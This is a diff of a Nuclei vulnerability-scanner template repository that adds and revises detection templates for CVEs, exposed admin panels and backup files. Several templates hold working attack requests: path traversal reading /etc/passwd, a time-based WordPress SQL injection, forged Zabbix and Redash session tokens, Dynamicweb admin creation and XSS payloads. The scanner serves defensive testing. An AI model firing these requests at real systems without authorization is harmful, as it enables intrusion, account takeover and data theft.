cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-9161
cwe-id: CWE-798
requests:
- method: GET
path:
- "{{BaseURL}}/user/scripts/login_par.js"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'txtChkUser'
- 'txtChkPassword'
condition: and
- type: status
status:
- 200

7
cves/2018/CVE-2018-9205.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2018-9205
info:
name: Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure
name: Drupal avatar_uploader v7.x-1.0-beta8 Local File Inclusion
author: daffainfo
severity: high
description: Vulnerability in avatar_uploader v7.x-1.0-beta8 , The code in view.php doesnt verify users or sanitize the file path.
description: In avatar_uploader v7.x-1.0-beta8 the view.php program doesn't restrict file paths, allowing unauthenticated users to retrieve arbitrary files.
remediation: Upgrade to the latest version of avatar_uploader.
reference:
- https://www.exploit-db.com/exploits/44501
- https://nvd.nist.gov/vuln/detail/CVE-2018-9205
@ -30,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

33
cves/2019/CVE-2019-9726.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2019-9726
info:
name: Homematic CCU3 - Directory Traversal / Arbitrary File Read
author: 0x_Akoko
severity: high
description: Directory Traversal / Arbitrary File Read in eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
reference:
- https://atomic111.github.io/article/homematic-ccu3-fileread
- https://www.cvedetails.com/cve/CVE-2019-9726
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-9726
cwe-id: CWE-22
tags: cve,cve2019,homematic,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/.%00./.%00./etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition: or
- type: status
status:
- 200

5
cves/2019/CVE-2019-9955.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-9955
info:
name: CVE-2019-9955 Zyxel XSS
name: Zyxel Reflected Cross-site Scripting
author: pdteam
severity: medium
tags: cve,cve2019,xss,zyxel
@ -21,7 +21,8 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?mobile=1&mp_idx=%22;alert(%271%27);//"
- "{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"
matchers:
- type: word
part: body

8
cves/2020/CVE-2020-11991.yaml
View File

@ -4,9 +4,9 @@ info:
name: Apache Cocoon 2.1.12 XML Injection
author: pikpikcu
severity: high
tags: cve,cve2020,apache,xml,cocoon
description: |
When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system.
tags: cve,cve2020,apache,xml,cocoon,xxe
description: When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
remediation: Upgrade to Apache Cocon 2.1.13 or later.
reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

6
cves/2021/CVE-2021-20158.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@ -49,3 +49,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by cs on 2022/02/25

37
cves/2021/CVE-2021-24762.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2021-24762
info:
name: Perfect Survey WordPress plugin before 1.5.2 SQLI
author: cckuailong
severity: critical
description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
reference:
- https://www.exploit-db.com/exploits/50766
- https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
- https://nvd.nist.gov/vuln/detail/CVE-2021-24762
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24762
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)"
matchers-condition: and
matchers:
- type: status
status:
- 404
- type: word
part: header
words:
- "wp-ps-session"
- type: dsl
dsl:
- 'duration>=4'

9
cves/2021/CVE-2021-29490.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-29490
info:
name: Jellyfin <10.7.2 SSRF
name: Jellyfin 10.7.2 SSRF
author: alph4byt3
severity: medium
description: Jellyfin is a free software media system that provides media from a dedicated server to end-user devices via multiple apps. Verions prior to 10.7.3 vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
@ -23,6 +24,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs on 2022/02/25

39
cves/2021/CVE-2021-41192.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-41192
info:
name: Redash Setup Configuration - Default secrets
author: bananabr
severity: medium
description: If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
reference:
- https://hackerone.com/reports/1380121
- https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
- https://nvd.nist.gov/vuln/detail/CVE-2021-41192
metadata:
shodan-query: http.favicon.hash:698624197
tags: cve,cve2021,redash,auth-bypass
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
cvss-score: 6.50
cve-id: CVE-2021-41192
cwe-id: CWE-1188
requests:
- method: GET
path:
- "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
- "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Enter your new password:"
- "redash"
condition: and
- type: status
status:
- 200

4
cves/2022/CVE-2022-0653.yaml
View File

@ -4,8 +4,8 @@ info:
name: Wordpress Profile Builder Plugin XSS
author: dhiyaneshDk
severity: medium
reference:
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
description: The Profile Builder &#8211; User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1
reference: https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
tags: cve,cve2022,wordpress,xss,wp-plugin
requests:

47
cves/2022/CVE-2022-21371.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2022-21371
info:
name: Oracle WebLogic Server LFI
author: paradessia,narluin
severity: high
description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2022-21371
tags: cve,cve2022,lfi,weblogic,oracle
requests:
- method: GET
raw:
- |+
GET {{path}} HTTP/1.1
Host: {{Hostname}}
payloads:
path:
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
unsafe: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition: or
- type: dsl
dsl:
- 'contains(all_headers, "text/xml")'
- 'contains(all_headers, "application/xml")'
condition: or
- type: status
status:
- 200

39
cves/2022/CVE-2022-23131.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
severity: critical
description: In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- https://github.com/1mxml/CVE-2022-23131
metadata:
shodan-query: http.favicon.hash:892542951
fofa-query: app="ZABBIX-监控系统" && body="saml"
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.8
cve-id: CVE-2022-23131
tags: cve,cve2022,zabbix,auth-bypass,saml,sso
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/index_sso.php"
- "{{BaseURL}}/index_sso.php"
headers:
Cookie: "zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: dsl
dsl:
- "contains(tolower(all_headers), 'location: zabbix.php?action=dashboard.view')"

39
cves/2022/CVE-2022-23134.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-23134
info:
name: Zabbix Setup Configuration - Unauthenticated Access
author: bananabr
severity: medium
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-23134
tags: cve,cve2022,zabbix,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
headers:
Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Database"
- "host"
- "port"
- "Zabbix"
condition: and
- type: status
status:
- 200

5
cves/2022/CVE-2022-25323.yaml
View File

@ -9,6 +9,11 @@ info:
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
tags: xss,cve,cve2022,zerof
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2022-25323
cwe-id: CWE-79
requests:
- method: GET

36
cves/2022/CVE-2022-25369.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2022-25369
info:
name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin addition
author: pdteam
severity: critical
reference: https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
metadata:
shodan-query: http.component:"Dynamicweb"
tags: cve,cve2022,dynamicweb,rce,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"Success": true'
- '"Success":true'
condition: or
- type: word
part: header
words:
- 'application/json'
- 'ASP.NET_SessionId'
condition: and
case-insensitive: true
- type: status
status:
- 200

9
exposed-panels/axigen-webadmin.yaml
View File

@ -4,8 +4,11 @@ info:
name: Axigen Web Admin
author: dhiyaneshDk
severity: info
description: This template determines if Axigen Web Admin is running.
reference:
- https://www.axigen.com/
metadata:
shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
shodan-query: 'http.title:"Axigen WebAdmin"'
tags: axigen,panel
requests:
@ -17,8 +20,10 @@ requests:
matchers:
- type: word
words:
- '<title>Axigen&nbsp;WebAdmin</title>'
- '<title>Axigen WebAdmin</title>'
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

5
exposed-panels/axigen-webmail.yaml
View File

@ -4,6 +4,9 @@ info:
name: Axigen WebMail
author: dhiyaneshDk
severity: info
description: This template determines if Axigen Webmail is running.
reference:
- https://www.axigen.com/
metadata:
shodan-query: 'http.title:"Axigen WebMail"'
tags: axigen,panel
@ -22,3 +25,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/25

35
exposed-panels/dynamicweb-panel.yaml Normal file
View File

@ -0,0 +1,35 @@
id: dynamicweb-panel
info:
name: Dynamicweb Login Panel
author: pdteam
severity: info
reference: https://www.dynamicweb.com
metadata:
shodan-query: http.component:"Dynamicweb"
tags: panel,dynamicweb
requests:
- raw:
- |
GET /Admin/Access/default.aspx HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
matchers-condition: and
matchers:
- type: word
part: body
words:
- Dynamicweb
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- version ([0-9.]+)

29
exposed-panels/homematic-panel.yaml Normal file
View File

@ -0,0 +1,29 @@
id: homematic-panel
info:
name: Homematic Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Homematic"
tags: panel,homematic,iot
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "HomeMatic Logo"
- "<title>HomeMatic WebUI</title>"
condition: or
- type: status
status:
- 200

29
exposed-panels/netflix-conductor-ui.yaml Normal file
View File

@ -0,0 +1,29 @@
id: netflix-conductor-ui
info:
name: Netflix Conductor UI Detection
author: c-sh0
severity: info
metadata:
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
tags: webserver,netflix,conductor,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '<title>Conductor UI</title>'
- '<title>Workflow UI</title>'
condition: or

31
exposed-panels/phoronix-pane;.yaml Normal file
View File

@ -0,0 +1,31 @@
id: phoronix-panel
info:
name: Phoronix Test Suite Panel Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.title:"phoronix-test-suite"
tags: panel,phoronix
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
regex:
- '<title>Phoronix Test Suite (.*) - Phoromatic - Welcome</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>Phoronix Test Suite (.*) - Phoromatic - Welcome</title>"

27
exposed-panels/raspberrymatic-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: raspberrymatic-panel
info:
name: RaspberryMatic Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.favicon.hash:-578216669
tags: panel,raspberrymatic,iot
requests:
- method: GET
path:
- "{{BaseURL}}/login.htm"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>RaspberryMatic WebUI</title>"
- type: status
status:
- 200

27
exposed-panels/redash-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: redash-panel
info:
name: Redash Panel Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.favicon.hash:698624197
tags: panel,redash
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login to Redash</title>"
- "<title>Login | Redash</title>"
condition: or
- type: status
status:
- 200

59
exposures/backups/zip-backup-files.yaml
View File

@ -1,37 +1,44 @@
id: zip-backup-files
info:
name: Compressed Web File
author: Toufik Airane,dwisiswant0
name: Compressed Backup File
author: toufik-airane,dwisiswant0,ffffffff0x
severity: medium
tags: exposure,backup
requests:
- method: GET
path:
- "{{BaseURL}}/{{Hostname}}.7z"
- "{{BaseURL}}/{{Hostname}}.bz2"
- "{{BaseURL}}/{{Hostname}}.gz"
- "{{BaseURL}}/{{Hostname}}.lz"
- "{{BaseURL}}/{{Hostname}}.rar"
- "{{BaseURL}}/{{Hostname}}.tar.gz"
- "{{BaseURL}}/{{Hostname}}.xz"
- "{{BaseURL}}/{{Hostname}}.zip"
- "{{BaseURL}}/{{Hostname}}.z"
- "{{BaseURL}}/{{Hostname}}.tar.z"
- "{{BaseURL}}/{{Hostname}}.db"
- "{{BaseURL}}/{{Hostname}}.sqlite"
- "{{BaseURL}}/{{Hostname}}.sqlitedb"
- "{{BaseURL}}/{{Hostname}}.sql.7z"
- "{{BaseURL}}/{{Hostname}}.sql.bz2"
- "{{BaseURL}}/{{Hostname}}.sql.gz"
- "{{BaseURL}}/{{Hostname}}.sql.lz"
- "{{BaseURL}}/{{Hostname}}.sql.rar"
- "{{BaseURL}}/{{Hostname}}.sql.tar.gz"
- "{{BaseURL}}/{{Hostname}}.sql.xz"
- "{{BaseURL}}/{{Hostname}}.sql.zip"
- "{{BaseURL}}/{{Hostname}}.sql.z"
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
- "{{BaseURL}}/{{FQDN}}.{{EXT}}" # www.example.com
- "{{BaseURL}}/{{RDN}}.{{EXT}}" # example.com
- "{{BaseURL}}/{{DN}}.{{EXT}}" # example
attack: pitchfork
payloads:
EXT:
- "7z"
- "bz2"
- "gz"
- "lz"
- "rar"
- "tar.gz"
- "xz"
- "zip"
- "z"
- "tar.z"
- "db"
- "sqlite"
- "sqlitedb"
- "sql.7z"
- "sql.bz2"
- "sql.gz"
- "sql.lz"
- "sql.rar"
- "sql.tar.gz"
- "sql.xz"
- "sql.zip"
- "sql.z"
- "sql.tar.z"
max-size: 500 # Size in bytes - Max Size to read from server response
matchers-condition: and
@ -59,4 +66,4 @@ requests:
- type: status
status:
- 200
- 200

44
miscellaneous/netflix-conductor-version.yaml Normal file
View File

@ -0,0 +1,44 @@
id: netflix-conductor-version
info:
name: Netflix Conductor Version Detection
author: c-sh0
severity: info
description: Obtain netflix conductor version information
reference:
- https://github.com/Netflix/conductor/blob/v1.6.0-rc1/ui/src/server.js#L17
- https://github.com/Netflix/conductor/blob/v3.1.0/rest/src/main/java/com/netflix/conductor/rest/controllers/AdminResource.java#L42
metadata:
shodan-query: http.title:"Conductor UI", http.title:"Workflow UI"
tags: tech,netflix,conductor,api
requests:
- method: GET
path:
- "{{BaseURL}}/api/admin/config"
- "{{BaseURL}}/api/sys"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- 'application/json'
- type: word
part: body
words:
- 'CONDUCTOR_'
case-insensitive: true
extractors:
- type: regex
group: 1
regex:
- 'conductor\-server\-([0-9.]+)\-'
- '"version":"([0-9.]+)\-'

20
technologies/empirecms-detect.yaml Normal file
View File

@ -0,0 +1,20 @@
id: empirecms-detect
info:
name: EmpireCMS Detect
author: princechaddha
severity: info
metadata:
shodan-query: http.html:EmpireCMS
tags: tech,empirecms
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: regex
part: body
regex:
- '<meta (.*)EmpireCMS(.*)>'

25
technologies/snipeit-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: snipeit-panel
info:
name: Snipe-IT Panel Detect
author: pikpikcu
severity: info
metadata:
shodan-query: http.favicon.hash:431627549
tags: panel,snipeit
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "window.snipeit"
- type: status
status:
- 200

6
vulnerabilities/other/goip-1-lfi.yaml
View File

@ -9,13 +9,13 @@ info:
- https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/
- http://www.hybertone.com/uploadfile/download/20140304125509964.pdf
- http://en.dbltek.com/latestfirmwares.html
tags: gsm,goip,lfi
tags: gsm,goip,lfi,iot
requests:
- method: GET
path:
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f ..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
- "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
matchers:
- type: regex

26
vulnerabilities/wordpress/wp-adaptive-xss.yaml Normal file
View File

@ -0,0 +1,26 @@
id: wp-adaptive-xss
info:
name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting
author: dhiyaneshDK
severity: medium
description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue
reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0
tags: tags
requests:
- raw:
- |+
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- <img/src/onerror=alert("document.domain")>
- type: status
status:
- 200

11
workflows/dynamicweb-workflow.yaml Normal file
View File

@ -0,0 +1,11 @@
id: dynamicweb-workflow
info:
name: Dynamicweb Security Checks
author: pdteam
description: A simple workflow that runs all dynamicweb related nuclei templates on a given target.
workflows:
- template: exposed-panels/dynamicweb-panel.yaml
subtemplates:
- tags: dynamicweb